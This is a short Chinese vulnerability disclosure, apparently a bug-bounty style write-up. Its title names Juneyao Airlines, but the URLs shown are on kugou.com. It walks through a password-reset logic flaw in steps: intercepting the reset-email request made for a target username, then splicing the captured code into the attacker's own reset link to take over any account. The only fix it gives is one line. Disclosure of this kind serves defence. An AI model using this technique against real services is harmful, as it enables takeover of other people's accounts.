吉祥航空逻辑漏洞可重置任意用户密码

吉祥航空逻辑漏洞可重置任意用户密码

1.吉祥航空逻辑漏洞可重置任意用户密码 篇一

1，先注册个用户测试，正常登录时点忘记密码，选择邮箱找回密码得到重置密码连接

www.kugou.com/newuc/user/resetpwd/code=EE0544XXXXX4CEBB2E41E56C8E0A6413E43FA3FC19B9E0109DC39CD44C7690639226405CB880FC5C514494DB1424138BBEE12128F8DFFA51BE00B1B03EDFAF2CF5939DF58D006AD7B87D360C02F506673E30A239B3E70E7D4D1C7A3221E867004F138738844FED20CB18DCB38C9394AAXXXXXXX3909CAE

2，选定一个目标用户，用户名为(123)，登录时依然点忘记密码，在找回密码处填写目标用户名123，然后下一步，

3，选择邮箱找回，点立即发送，并抓包。

抓包得到：

POST /newuc/user/sendemail/code=EE0544E28BxxxxxxxxE226A370EBF23FC56592BFEC3962E8156A71054BE3594F143AEF142A1425AE5F09E961A040DE6F90F8F305C5E866A8A4EF00DB71289745F6F08CAA790F5AA67060541354E57E71BE58CE00B80930

此时，抓包得到的code只需要跟之前用自己的邮箱得到的连接组合一下就可以重置用户123

的密码了，

组合得到：

www.kugou.com/newuc/user/resetpwd/code=EE0544E28Bxxxxxxxxx6A370EBF23FC56592BFEC3962E8156A71054BE3594F143AEF142A1425AE5F09E961A040DE6F90F8F305C5E866A8A4EF00DB71289745F6F08CAA790F5AA67060541354E57E71BE58CE00B80930

5，重置密码后登陆：

修复方案：

权限验证